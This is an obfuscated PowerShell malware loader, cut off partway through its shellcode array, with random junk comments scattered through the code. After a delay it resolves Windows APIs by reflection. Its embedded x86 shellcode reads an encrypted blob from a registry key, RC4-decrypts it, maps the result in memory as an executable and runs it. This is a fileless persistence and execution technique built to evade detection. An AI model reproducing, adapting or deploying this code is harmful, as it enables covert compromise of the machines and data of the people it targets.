\r\n#avobmsjvucjuocxunkajuvogibdcmkeqp\r\nsleep(15);try{\r\n#wqdyo\r\nfunction gdelegate{\r\n#fdfffepqoo\r\nParam ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);\r\n#gktfrbj\r\n$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);\r\n#nwbkci\r\n$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");\r\n#thlr\r\n$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");\r\n#cxywzfl\r\nreturn $TypeBuilder.CreateType();}\r\n#alkfpyijql\r\nfunction gproc{\r\n#mkleldsfcl\r\nParam ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);\r\n#bpnie\r\n$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\\")[-1].Equals("System.dll")};\r\n#vdznigk\r\n$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");\r\n#jutvbiw\r\nreturn $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}\r\n#icebofnc\r\n[Byte[]] $sc32 = 0x55,<#rpr#>0x8B,0xEC,<#ji#>0x81,0xC4,0x00,0xFA,0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,<#atw#>0x52,0x30,0x8B,0x52,<#bep#>0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,0x6A,0x18,0x59,0x31,0xFF,0x31,0xC0,<#ccd#>0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,0xBC,0x4A,0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,<#ro#>0x5D,0xFC,<#sc#>0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,<#cw#>0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,<#lpj#>0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,<#qkq#>0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,<#at#>0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,<#nxg#>0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,<#lcb#>0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,<#olr#>0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x61,0x72,0x79,0x41,<#na#>0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,<#xtg#>0x8B,0x00,0x8B,0x55,0xCC,<#ige#>0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,<#usr#>0x81,0x39,0x47,0x65,0x74,0x50,<#nfz#>0x75,0x56,0x8D,0x41,0x04,0x81,0x38,<#cp#>0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,<#jo#>0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,<#sbs#>0x75,0x38,0x8B,<#ac#>0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,<#dd#>0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,<#vue#>0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,<#lx#>0x02,0x03,<#pha#>0xD0,0x8B,<#st#>0x02,0x03,0x45,0xFC,0x89,0x45,0xB8,<#oai#>0x81,0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,<#ums#>0x38,<#vzz#>0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,<#uu#>0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,<#jpx#>0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,<#sxs#>0xA8,0x81,0x39,<#kdk#>0x45,0x78,0x69,0x74,0x75,0x63,0x8D,0x41,0x04,<#iwj#>0x81,<#wny#>0x38,0x50,0x72,0x6F,0x63,0x75,0x58,0x8D,<#mpl#>0x41,0x08,0x80,0x38,0x65,0x75,0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,<#eo#>0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,<#xzx#>0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#bx#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,<#mey#>0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,<#ebh#>0x03,0xD0,<#qyl#>0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,<#dni#>0x0F,0x85,0x3E,0xFE,0xFF,0xFF,<#qn#>0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,0x85,0x32,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,0x85,0x34,0xFF,0xFF,0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,0x85,<#mzf#>0x36,0xFF,0xFF,0xFF,0x32,<#ld#>0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,<#lbr#>0xFF,0xFF,0x6C,<#pu#>0xC6,0x85,0x3B,0xFF,0xFF,0xFF,0x00,0x8D,0x85,0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x4F,0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0xC3,<#th#>0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,<#ksk#>0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#uaz#>0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0xCB,0x81,0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,0x35,<#tx#>0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,0x8D,<#niu#>0x41,0x04,0x81,0x38,<#jk#>0x75,0x65,0x72,<#lq#>0x79,0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,0x38,0x65,0x45,0x78,0x41,0x75,0x3D,0x83,0xC1,<#yqf#>0x10,0x80,0x39,0x00,0x75,<#tn#>0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,<#wtn#>0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,<#vt#>0xC3,0x89,<#hne#>0x45,0xAC,0x46,<#men#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,<#ckz#>0xFE,0xFF,0xFF,0x8B,0x45,0x08,0x05,0x48,0x0A,0x00,0x00,0x89,0x85,0x7C,0xFF,0xFF,0xFF,<#ikq#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE4,0x00,0x00,<#qev#>0x00,0x89,<#xsb#>0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,0x85,0x64,<#ao#>0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x02,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,<#oz#>0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,<#xde#>0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,<#chq#>0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#bu#>0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,<#kf#>0xFF,<#yac#>0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,<#yl#>0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,<#mx#>0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#hn#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,<#ds#>0x85,0xB8,0x00,0x00,0x00,0x33,0xC0,0x89,0x85,<#uu#>0x64,0xFF,0xFF,0xFF,<#xo#>0x33,0xC0,0x89,0x85,<#mnf#>0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,<#gdg#>0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,<#gwq#>0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,<#nrl#>0x55,0xAC,0x85,<#as#>0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,<#qr#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#fzq#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,<#npu#>0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,<#epp#>0x85,<#rc#>0x70,0xFF,0xFF,0xFF,<#poi#>0x50,<#tg#>0xFF,0x55,0xAC,<#stt#>0x85,0xC0,<#kw#>0x75,0x02,0xB3,0x01,0x84,0xDB,<#sax#>0x75,0x05,<#omp#>0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,<#txd#>0xDC,0x00,0x00,0x00,0x50,0x8B,0x85,<#arg#>0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,0x00,0xFA,0xFF,0xFF,0x50,<#cpp#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,0x46,0x83,0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,<#axj#>0x03,0x19,<#vqm#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,<#wrv#>0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,0x00,0x00,0x00,0x8A,0x01,<#onn#>0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,<#zq#>0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,<#zjb#>0x33,0xDB,0x33,0xFF,<#xgp#>0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,<#dn#>0x85,<#oo#>0x60,0xFF,0xFF,0xFF,0x50,0x6A,<#bzq#>0x00,0xFF,<#ato#>0x55,<#tu#>0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,0xBD,0x5C,0xFF,<#kk#>0xFF,0xFF,0x00,0x74,0x29,0x8B,0x85,<#ynp#>0x5C,0xFF,0xFF,0xFF,0x89,0x85,<#ttp#>0x4C,0xFF,0xFF,0xFF,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#bbk#>0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,<#ddv#>0xFF,0xFF,0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,<#upn#>0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,<#xrf#>0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,0x9D,0x00,<#crf#>0xFB,0xFF,0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,0xFF,0x00,0x00,0x00,<#oa#>0x32,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,0x04,0x32,0x46,<#suu#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,<#tx#>0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,<#yn#>0xD4,0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,<#vy#>0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,0x6A,0x40,<#lv#>0x68,0x00,0x30,0x00,0x00,<#dlf#>0x53,<#fru#>0x6A,<#ar#>0x00,0xFF,0x55,0xA8,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x54,0x50,0x8B,<#sp#>0x85,<#ltb#>0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,<#lfl#>0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE0,0x00,0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,0x8B,0x85,0x4C,0xFF,0xFF,<#rpo#>0xFF,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,<#imm#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x8B,<#wfm#>0x95,0x7C,0xFF,0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,<#pj#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,0x7C,0x5F,0x40,0x89,<#not#>0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,<#qv#>0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,<#yxg#>0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,0x8D,<#xe#>0x0C,0x89,0x03,<#vzm#>0xD1,0x89,0x95,0x50,0xFF,0xFF,<#hki#>0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,<#gk#>0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,<#zci#>0xFF,0xFF,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,<#ri#>0x34,<#ssf#>0x3B,0x45,0xF8,0x0F,0x84,<#vm#>0xCB,0x00,<#ns#>0x00,0x00,0x8B,<#qvm#>0x45,0xD0,0x8B,0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,<#of#>0x00,0x00,<#yk#>0x00,0x00,0x0F,0x86,0x87,0x00,0x00,<#va#>0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,<#mx#>0x00,0x00,0x00,0x03,0x45,0xF0,0x89,<#lku#>0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,<#itp#>0xE4,<#vf#>0x8B,0x45,0xEC,0x8B,0x40,0x04,0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,<#qv#>0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,0x75,0x10,0x8B,0x45,0xE8,0x03,0xC1,0x89,0x45,0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,0x3C,0xFF,0xFF,<#sw#>0xFF,<#vj#>0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,<#it#>0xEC,0x89,<#ikx#>0x45,<#irx#>0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,<#yia#>0x45,<#ngg#>0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,<#lw#>0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,<#eeu#>0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#ebt#>0x86,0x9E,0x00,<#cf#>0x00,<#iuu#>0x00,0x8B,0x45,<#iu#>0xD0,0x8B,0x80,0x80,<#sg#>0x00,0x00,<#tav#>0x00,0x03,0x45,0xF8,0x89,0x45,0x8C,0xEB,0x7F,0x03,<#kae#>0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x74,0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,<#da#>0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x88,0x8B,0x45,0x8C,0x8B,<#lo#>0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,<#ut#>0x8B,0x30,<#eyt#>0xF7,0xC6,0x00,0x00,0x00,0x80,0x74,0x12,0x81,0xE6,<#ruo#>0xFF,0xFF,0x00,0x00,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,<#sg#>0xEB,0x10,0x03,0x75,0xF8,0x83,0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,<#ni#>0x83,0x45,0x88,<#eb#>0x04,0x83,<#fpa#>0x45,<#za#>0x84,0x04,0x8B,0x45,0x88,0x83,<#ezq#>0x38,0x00,0x75,0xC1,0x83,0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,<#fyw#>0x8B,0x40,0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,0xF8,0xFF,0x55,0xF4,<#vag#>0x6A,0x00,<#hoz#>0xFF,0x55,0xA4,<#mri#>0x5F,0x5E,<#qb#>0x5B,0x8B,0xE5,0x5D,0xC2,0x04,<#sh#>0x00,0x8D,0x40,<#mpx#>0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,<#ytl#>0x37,<#zkf#>0x47,0x57,0x73,0x61,0x41,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#gca#>0x00,0x00,0x00,<#rz#>0x00,0x00,0x00,<#no#>0x00,0x00,0x00,<#dfd#>0x00,0x00,0x00,0x00,0x47,0x73,0x44,0x79,0x71,0x74,0x55,0x36,0x71,0x6E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x72,<#qfr#>0x82,0x97,0x46,0xE4,0x1B,0xF2,0xAB,0xD9,0x00,0x0A,0x97,0x82,0x25,0x5F,0xE4,0x99,0x5D,0xB6,0x8E,0x73,0x23,0x46,0x7A,0x92,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,<#ju#>0x00,0x6C,0x00,0x6C,0x00,0x3C,0x00,0x3C,<#aws#>0x00,0x3A,0x00,0x3A,0x00,<#bfw#>0x3E,0x00,0x3E,0x00,<#jp#>0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x62,0x00,<#ad#>0x70,0x00,0x73,0x00,0x3A,0x00,0x3A,0x00,0x62,0x00,0x70,0x00,0x73,0x00,0x6E,0x00,0x75,0x00,0x6D,0x00,0x3A,0x00,0x38,0x00,0x36,0x00,0x34,0x00,<#vy#>0x3A,0x00,0x6E,0x00,0x75,<#zkg#>0x00,0x6D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wcm#>0x00,0x00,<#kx#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x19,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,<#ae#>0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,0